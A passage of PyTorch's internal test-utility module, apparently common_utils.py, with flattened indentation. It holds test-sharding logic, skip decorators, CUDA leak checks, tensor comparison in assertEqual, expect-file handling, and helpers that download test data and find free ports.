elif RUN_PARALLEL > 1:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
import xmlrunner
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
if IS_WINDOWS:
@contextmanager
def TemporaryFileName():
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
f = tempfile.NamedTemporaryFile(delete=False)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName():
with tempfile.NamedTemporaryFile() as f:
yield f.name
def _check_module_exists(name):
import importlib
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
if TEST_NUMPY:
import numpy as np
numpy_to_torch_dtype_dict = {
np.bool : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def get_cpu_type(type_name):
module, name = type_name.rsplit('.', 1)
assert module == 'torch.cuda'
return getattr(torch, name)
def get_gpu_type(type_name):
if isinstance(type_name, type):
type_name = '{}.{}'.format(type_name.__module__, type_name.__name__)
module, name = type_name.rsplit('.', 1)
assert module == 'torch'
return getattr(torch.cuda, name)
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.type(), get_gpu_type(obj.type()))
with torch.no_grad():
res = obj.clone().type(t)
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
yield
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# we don't need CUDA synchronize because the statistics are not tracked at
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=100,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_PYTORCH_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE',
'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
disabled_test_from_issues = None
def check_disabled(test_name):
global disabled_test_from_issues
if disabled_test_from_issues is None:
disabled_test_from_issues = {}
def read_and_process():
url = 'https://raw.githubusercontent.com/zdevito/pytorch_disabled_tests/master/result.json'
contents = urlopen(url, timeout=1).read().decode('utf-8')
the_response = json.loads(contents)
for item in the_response['items']:
title = item['title']
key = 'DISABLED '
if title.startswith(key):
test_name = title[len(key):].strip()
disabled_test_from_issues[test_name] = item['html_url']
if not IS_SANDCASTLE and os.getenv("PYTORCH_RUN_DISABLED_TESTS", "0") != "1":
try:
read_and_process()
except Exception:
print("Couldn't download test skip set, leaving all tests enabled...")
if test_name in disabled_test_from_issues:
raise unittest.SkipTest(
"Test is disabled because an issue exists disabling it: {}".format(disabled_test_from_issues[test_name]) +
" To enable set the environment variable PYTORCH_RUN_DISABLED_TESTS=1")
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride, for
# example.
# TODO: provide a better mechanism for generated tests to set rtol/atol.
_precision: float = 0
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS and not TEST_WITH_ROCM:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_cuda_policy(test_method, policy))
def wrap_method_with_cuda_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_cuda_policy(method, self.assertLeaksNoCudaTensors)
def setUp(self):
if TEST_SKIP_FAST:
if not getattr(self, self._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
check_disabled(str(self))
set_rng_seed(SEED)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device='cpu'):
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = torch.randn(*v_size, device=device)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size))
if not is_uncoalesced:
x = x.coalesce()
else:
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
r = self.safeCoalesce(t)
return r.to_dense()
def safeCoalesce(self, t):
tc = t.coalesce()
self.assertEqual(tc.to_dense(), t.to_dense())
self.assertTrue(tc.is_coalesced())
# then it's a 0D tensor, not a 2D tensor.
if t._nnz() == 0:
self.assertEqual(t._indices(), tc._indices())
self.assertEqual(t._values(), tc._values())
return tc
value_map = {}
for idx, val in zip(t._indices().t(), t._values()):
idx_tup = tuple(idx.tolist())
if idx_tup in value_map:
value_map[idx_tup] += val
else:
value_map[idx_tup] = val.clone() if isinstance(val, torch.Tensor) else val
new_indices = sorted(list(value_map.keys()))
new_values = [value_map[idx] for idx in new_indices]
if t._values().ndimension() < 2:
new_values = t._values().new(new_values)
else:
new_values = torch.stack(new_values)
new_indices = t._indices().new(new_indices).t()
tg = t.new(new_indices, new_values, t.size())
self.assertEqual(tc._indices(), tg._indices())
self.assertEqual(tc._values(), tg._values())
if t.is_coalesced():
self.assertEqual(tc._indices(), t._indices())
self.assertEqual(tc._values(), t._values())
return tg
def compare_with_numpy(self, torch_fn, np_fn, tensor_like, device=None, dtype=None):
assert TEST_NUMPY
assert dtype is not torch.bfloat16
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
a = tensor_like.detach().cpu().numpy()
t = tensor_like
else:
a = np.array(tensor_like, dtype=torch_to_numpy_dtype_dict[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
np_result = torch.from_numpy(np_result.copy())
self.assertEqual(np_result, torch_result)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
atol = max(atol, self.precision)
return _compare_scalars_internal(a, b, rtol=cast(float, rtol), atol=cast(float, atol), equal_nan=equal_nan)
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified the other must be, too"
# Tensor x Number and Number x Tensor comparisons
if isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
super().assertEqual(x.is_sparse, y.is_sparse, msg=msg)
super().assertEqual(x.is_quantized, y.is_quantized, msg=msg)
if x.is_sparse:
x = self.safeCoalesce(x)
y = self.safeCoalesce(y)
indices_result, debug_msg = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor indices failed to compare as equal! " + debug_msg
self.assertTrue(indices_result, msg=msg)
values_result, debug_msg = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor values failed to compare as equal! " + debug_msg
self.assertTrue(values_result, msg=msg)
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Quantized representations failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
result, debug_msg = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Tensors failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
super().assertEqual(x, y, msg=msg)
elif type(x) == set and type(y) == set:
super().assertEqual(x, y, msg=msg)
elif isinstance(x, dict) and isinstance(y, dict):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
super().assertEqual(x, y, msg=msg)
elif is_iterable(x) and is_iterable(y):
super().assertEqual(len(x), len(y), msg=msg)
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
self.assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result and msg is None:
assert debug_msg is not None
msg = "Scalars failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
super().assertEqual(x, y, msg=msg)
def assertAlmostEqual(self, x, y, *, places=None, msg=None, delta=None):
prec = delta
if places:
prec = 10**(-places)
rtol = None if prec is None else 0
self.assertEqual(x, y, msg=msg, atol=prec, rtol=rtol)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def maybeWarnsRegex(self, category, regex=''):
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
warnings.filterwarnings("ignore", message=regex, category=category)
try:
yield
finally:
if len(ws) != 0:
msg = 'Caught unexpected warnings:\n'
for w in ws:
msg += warnings.formatwarning(
w.message, w.category, w.filename, w.lineno, w.line)
msg += '\n'
self.fail(msg)
def assertExpected(self, s, subname=None):
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
f.write(s)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id))
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "XXX"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
import subprocess
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
pipes = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
return pipes.communicate()[1].decode('ascii')
if sys.version_info < (3, 2):
# assertRegexpMatches renamed to assertRegex in 3.2
assertRegex = unittest.TestCase.assertRegexpMatches
# assertRaisesRegexp renamed to assertRaisesRegex in 3.2
assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
if sys.version_info < (3, 5):
# assertNotRegexpMatches renamed to assertNotRegex in 3.5
assertNotRegex = unittest.TestCase.assertNotRegexpMatches
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg)
def find_free_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
sockname = sock.getsockname()
sock.close()
return sockname[1]
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
tries_remaining = 10
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if str(error) in connect_errors:
tries_remaining -= 1
if tries_remaining == 0:
raise
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
